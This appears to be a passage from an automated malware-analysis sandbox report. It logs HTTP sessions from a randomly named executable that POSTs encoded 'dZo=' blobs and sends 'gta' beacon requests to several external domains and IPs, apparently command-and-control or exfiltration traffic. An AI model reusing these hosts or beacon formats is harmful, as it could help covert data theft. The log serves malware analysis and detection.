                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.954117217.116.0.191801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:15.903558969 CEST1732OUTPOST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 57 50 34 55 38 35 51 38 49 43 6e 76 46 2f 47 35 37 6c 36 45 63 71 6c 6e 6e 57 78 48 4a 79 54 74 63 4c 35 59 2f 6b 63 5a 64 32 4b 52 69 6f 37 75 79 4a 72 39 75 34 51 6a 4a 49 56 30 65 61 6a 70 50 46 30 62 62 71 48 51 65 78 67 72 31 46 6e 55 52 54 39 74 52 53 2b 34 4a 68 37 49 35 57 39 54 42 44 77 73 78 34 32 44 52 46 56 62 42 57 37 6e 38 71 46 56 6b 4c 64 2b 48 47 46 31 2b 6b 48 37 53 44 6c 6e 57 6b 36 68 54 4b 2f 78 4f 72 33 75 30 46 66 61 59 35 47 31 4e 45 6a 41 50 67 43 69 69 56 66 66 6f 2f 37 48 39 66 34 63 32 37 56 4a 30 6e 65 4f 63 61 35 4a 44 6f 5a 41 76 46 51 62 4a 42 62 5a 59 6c 55 4c 78 4e 4d 4b 66 6c 67 64 52 4f 75 34 41 7a 57 35 6d 42 71 58 74 4a 75 68 6b 2b 33 4c 6b 4b 49 6b 6c 6d 50 76 41 75 6f 46 6d 6f 46 41 45 73 4a 63 48 63 6c 50 6f 67 6d 45 53 41 76 62 53 51 78 47 35 70 71 43 2b 65 6c 57 72 6b 4a 39 57 67 4c 33 38 46 52 6a 6b 5a 4d 70 65 30 74 6f 2b 63 64 43 42 50 79 53 52 36 31 4c 59 37 65 76 73 33 51 2b 4c 75 59 6f 79 63 34 37 49 73 70 51 69 77 4e 54 4b 76 63 4d 76 75 [TRUNCATED]
                                                      Data Ascii: dZo=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2KRio7uyJr9u4QjJIV0eajpPF0bbqHQexgr1FnURT9tRS+4Jh7I5W9TBDwsx42DRFVbBW7n8qFVkLd+HGF1+kH7SDlnWk6hTK/xOr3u0FfaY5G1NEjAPgCiiVffo/7H9f4c27VJ0neOca5JDoZAvFQbJBbZYlULxNMKflgdROu4AzW5mBqXtJuhk+3LkKIklmPvAuoFmoFAEsJcHclPogmESAvbSQxG5pqC+elWrkJ9WgL38FRjkZMpe0to+cdCBPySR61LY7evs3Q+LuYoyc47IspQiwNTKvcMvu1P3TdpcMLFzTzZIbUgxTheBi3ta5VRD4wvG27XlpcBbsoc/0fe2tKGWt2C+q3ySdFheoa9wPWifeVYbqsDwl1gaqGESkVJSfC1qgHZ9ir3vCDjZA7bY2KfpWj6bFPz8RIGUkz//2G3qnpbxvY49IDS4DoYR8aoAO7+1SOJPLyKXHUXBfh9Z3YPl3E7KSG9isimtQ7HdBd1vwaZb0SEjYDCAldqCfOt6pFBh1sxpnLrkyeK0V9vHVakeRHIR3R3pxI/C481Ygln7xfA4LrHeUIyPBOcMhe7V9pP4ydspND6L0wu39BhKaFaoMpTp25r34MSXB/CHvqhPQqT9+hhBBZiJefB7bWM3kAEURW19alSJkEJmgdi2+YWDXoC895Qib1eO6r6cT504q5FFHIekPGgGaT38zpJ2EBSmNxVzLikQimT4AhFc0tm89NzdgnnF3CLYDcIPlCYbSNs73rkTQ81L+XjhyZ7ygFsu6m68VcaJ/HOahDXF0Yu6/8/ELFyWp8Xx/HHhJ/XgHHcCEFClAYKetcXQvQvYEwOVL54+kyJQE3kKfsZQyf6VjrUN9iSHTVEupGihpXvly8R9vNzKHuosKgOf93jLKoc16JdIcp1dL9KFCGMu30vQMLVTy/rY0DskW5Fjn38eBq/q7+v+gGwdpV3VgsQVHLi [TRUNCATED]
                                                      Aug 18, 2024 18:25:16.688044071 CEST572INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:16 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Raw: 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 22 3e 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f [TRUNCATED]
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.954118217.116.0.191801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:18.434490919 CEST438OUTGET /7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:19.127294064 CEST1236INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:19 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 922
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8
                                                      Age: 0
                                                      X-Cache: MISS
                                                      X-BKSrc: 0.6
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 61 2e 6e 65 74 2f 37 66 66 78 2f 3f 64 5a 6f 3d 62 4e 51 30 2f 4f 4e 53 55 69 7a 38 43 76 65 74 39 57 65 6b 48 73 59 36 67 6c 41 55 65 41 6e 64 5a 39 4e 55 31 46 6f 4c 58 68 61 33 74 76 37 30 73 35 62 71 75 34 51 36 42 76 35 65 47 70 61 6f 54 44 59 76 62 72 54 31 52 6a 56 37 34 46 36 77 5a 54 56 4f 57 77 44 2f 4a 41 76 65 30 46 73 48 4c 33 38 41 37 70 72 70 62 7a 31 78 4e 45 6a 6c 69 77 3d 3d 26 61 6d 70 3b 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 27 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 6c 65 63 6f 69 6e 73 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8'" /> <title>Redirecting to http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8">http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0F
                                                      Aug 18, 2024 18:25:19.127311945 CEST70INData Raw: 73 48 4c 33 38 41 37 70 72 70 62 7a 31 78 4e 45 6a 6c 69 77 3d 3d 26 61 6d 70 3b 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 3c 2f 61 3e 2e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: sHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8</a>. </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.9541193.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:24.238148928 CEST692OUTPOST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 7a 4d 4d 74 52 38 6f 66 6b 4c 5a 63 54 75 62 68 55 54 51 70 7a 64 6f 63 65 44 68 49 6f 7a 62 6c 52 4c 6f 5a 30 46 53 31 74 69 37 35 4b 74 63 4d 7a 46 70 38 69 30 59 34 6b 34 43 63 32 54 41 6f 6d 38 2f 69 6c 6b 6b 78 4f 61 6b 79 63 37 74 70 76 46 6a 36 53 66 77 70 49 44 59 78 51 33 34 65 30 50 2f 41 64 6f 42 65 2f 32 41 30 6c 43 66 6a 68 38 71 36 43 57 33 49 55 69 36 69 6f 68 4c 52 34 53 68 78 42 67 54 56 42 6d 54 69 35 39 78 73 76 76 44 53 4f 6d 54 41 42 6b 39 54 41 43 61 6b 6f 78 79 34 76 49 44 6e 7a 6c 55 52 48 47 61 56
                                                      Data Ascii: dZo=3ubKFab14mRwzMMtR8ofkLZcTubhUTQpzdoceDhIozblRLoZ0FS1ti75KtcMzFp8i0Y4k4Cc2TAom8/ilkkxOakyc7tpvFj6SfwpIDYxQ34e0P/AdoBe/2A0lCfjh8q6CW3IUi6iohLR4ShxBgTVBmTi59xsvvDSOmTABk9TACakoxy4vIDnzlURHGaV


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.9541203.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:26.779285908 CEST716OUTPOST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 42 50 6c 52 71 59 5a 31 42 4f 31 75 69 37 35 53 39 63 4a 2b 6c 70 37 69 30 56 50 6b 34 75 63 32 54 45 6f 6d 2b 6e 69 6b 58 38 79 50 4b 6b 30 56 62 74 76 69 6c 6a 36 53 66 77 70 49 44 6b 58 51 78 51 65 31 36 33 41 63 4a 42 64 35 47 41 33 69 43 66 6a 7a 4d 71 32 43 57 33 68 55 6a 6e 50 6f 69 7a 52 34 54 52 78 41 78 54 57 4c 6d 54 67 6b 74 77 70 72 66 4b 41 47 52 43 56 5a 47 63 77 64 6c 71 44 72 51 53 6d 2b 36 4b 38 6d 79 55 32 41 68 54 39 34 57 63 4d 2f 4f 35 73 33 7a 41 34 4c 70 57 32 5a 55 4a 6e 65 67 3d 3d
                                                      Data Ascii: dZo=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpBPlRqYZ1BO1ui75S9cJ+lp7i0VPk4uc2TEom+nikX8yPKk0Vbtvilj6SfwpIDkXQxQe163AcJBd5GA3iCfjzMq2CW3hUjnPoizR4TRxAxTWLmTgktwprfKAGRCVZGcwdlqDrQSm+6K8myU2AhT94WcM/O5s3zA4LpW2ZUJneg==


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.9541213.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:29.312855005 CEST1729OUTPOST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 33 75 62 4b 46 61 62 31 34 6d 52 77 31 73 63 74 43 4c 30 66 6a 72 5a 66 63 4f 62 68 61 44 51 6c 7a 64 6b 63 65 41 74 59 70 41 33 6c 52 59 51 5a 31 6d 36 31 76 69 37 35 4d 74 63 49 2b 6c 70 71 69 30 4e 4c 6b 34 79 6d 32 52 4d 6f 33 74 76 69 74 47 38 79 47 4b 6b 30 58 62 74 75 76 46 6a 4b 53 66 67 74 49 44 55 58 51 78 51 65 31 37 48 41 5a 6f 42 64 69 47 41 30 6c 43 66 56 68 38 72 70 43 53 54 62 55 6a 54 35 72 53 54 52 34 7a 42 78 43 44 37 57 57 57 54 6d 6e 74 77 50 72 66 58 65 47 56 62 75 5a 43 64 56 64 6a 61 44 37 56 50 59 6a 34 48 67 35 79 4d 66 57 41 79 5a 39 52 6b 6e 78 36 59 48 71 67 73 35 66 70 54 79 66 6c 55 70 64 79 70 69 66 46 50 70 64 33 4f 6c 47 6e 4d 31 49 6e 68 4c 47 59 63 66 74 4c 53 78 32 66 57 35 47 50 5a 30 48 33 58 37 50 65 31 31 69 4e 41 7a 4b 6a 7a 63 61 67 35 54 5a 6f 63 61 66 78 2b 6b 57 4c 6c 2b 75 7a 54 34 62 43 49 33 72 59 4d 76 37 2f 50 46 6c 34 50 74 46 4e 6d 38 66 32 76 73 74 68 6b 67 44 2f 6c 77 51 49 47 31 52 6b 72 52 39 77 77 75 32 31 36 72 61 62 4a 4a 71 76 [TRUNCATED]
                                                      Data Ascii: dZo=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpA3lRYQZ1m61vi75MtcI+lpqi0NLk4ym2RMo3tvitG8yGKk0XbtuvFjKSfgtIDUXQxQe17HAZoBdiGA0lCfVh8rpCSTbUjT5rSTR4zBxCD7WWWTmntwPrfXeGVbuZCdVdjaD7VPYj4Hg5yMfWAyZ9Rknx6YHqgs5fpTyflUpdypifFPpd3OlGnM1InhLGYcftLSx2fW5GPZ0H3X7Pe11iNAzKjzcag5TZocafx+kWLl+uzT4bCI3rYMv7/PFl4PtFNm8f2vsthkgD/lwQIG1RkrR9wwu216rabJJqvbcHp/L3JF2iA/29xt/bs+9n0reeh0cRQcVkf70guiVUQgv9PU1h6xut6rAab+F3Ofp0yvKpI0a2Cc4IdHPPgQIO8bObCtWOGkQP8kLcFOIQy+TK3JjBVCzRQWWGk5dl4uAZQcONmGxdZqNctb5u1DCFdohuEw/IJGZk9raSO72lh4HBRhIh8dvv0c19+0NDC1bdkYojiKHlhJENbCKwCEyAem1wxoH6QZ6EjqtuOwgcF02T4CoyfNQYt/LMFlr1M06j2m3XkW9RRv1sv6DnqeGoqBqwkNeZEL5nTdsPugX6gXiruodyRROHvEK8CK4m109HExZf05RQCqOzSCFKfplZOSaRUkLukJ2MN+2Mbs4E39EYJPEijGy7YpM0dbnCn4QtAnluCetuZrX3QQVFeq9hw4VqsgADQPzhAeAl08vKpC5NCc6StR38CoK53AO+bjXLREUO/SzUdUi+VpOXAtOUPrbEwuen0y7p8/5ALGIS1ydQZxIOI8iCLjMfiDP/mHJKQAto0snrkhm2E6U4SHvveFmruUROs0pb1BKwzH2tQBECqpORezWqC5DiS0BMvu3wZ/EqdSYUI5RvLwnjfMUlKLdcwv/Gikp3BxyTcCSiWjFLGne8RD1her5maXimowpE0wyf61obGMHYLGSFLcQlogXwji1Y/Wl [TRUNCATED]


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.9541223.33.130.190801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:31.840135098 CEST437OUTGET /1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:33.232374907 CEST394INHTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 6f 3d 36 73 7a 71 47 75 6a 31 7a 43 42 53 37 65 45 57 50 4b 34 48 6a 2b 67 52 4b 2f 6e 4c 41 69 45 32 75 2f 4d 32 59 53 70 55 6f 6a 6e 5a 55 64 38 77 6b 6d 43 6c 6c 68 76 78 45 37 45 76 6c 31 46 41 6d 56 39 36 6c 34 47 4f 38 7a 38 33 37 66 75 4e 6b 30 38 30 65 36 55 73 65 4c 5a 56 6b 30 48 49 47 65 49 73 42 45 41 67 52 58 67 31 77 72 33 4e 4a 51 3d 3d 26 67 74 61 3d 72 7a 71 58 66 34 41 30 32 46 45 6c 5f 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.954123109.95.158.127801808C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 18, 2024 18:25:38.362489939 CEST701OUTPOST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 50 4b 59 5a 52 4b 6f 6e 6f 4d 5a 6e 57 7a 2f 6d 43 4a 4b 49 35 73 59 65 38 36 34 67 58 30 4b 6b 65 31 4e 2b 69 30 62 32 6c 38 4e 75 57 61 67 71 4b 2b 6c 4c 57 68 67 52 38 68 75 47 46 59 4a 79 4d 4a 51 43 77 77 4b 7a 35 54 30 36 2b 6f 43 7a 57 45 78 43 6f 76 31 50 67 58 41 72 2b 4a 73 62 46 36 33 6d 4b 38 49 74 73 34 77 70 55 59 38 36 52 64 4b 2b 35 78 48 2f 4e 48 65 50 4b 55 78 54 6c 4c 52 43 36 68 53 6a 44 72 43 73 54 74 71 53 36 57 42 75 6c 68 4a 65 34 41 43 6f 4c 76 6c 2b 4e 69 72 76 72 36 31 57 72 41 68 48 76 6c 65 65
                                                      Data Ascii: dZo=cmHr04oQ6fWhPKYZRKonoMZnWz/mCJKI5sYe864gX0Kke1N+i0b2l8NuWagqK+lLWhgR8huGFYJyMJQCwwKz5T06+oCzWExCov1PgXAr+JsbF63mK8Its4wpUY86RdK+5xH/NHePKUxTlLRC6hSjDrCsTtqS6WBulhJe4ACoLvl+Nirvr61WrAhHvlee
                                                      Aug 18, 2024 18:25:39.036468983 CEST1043INHTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:38 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 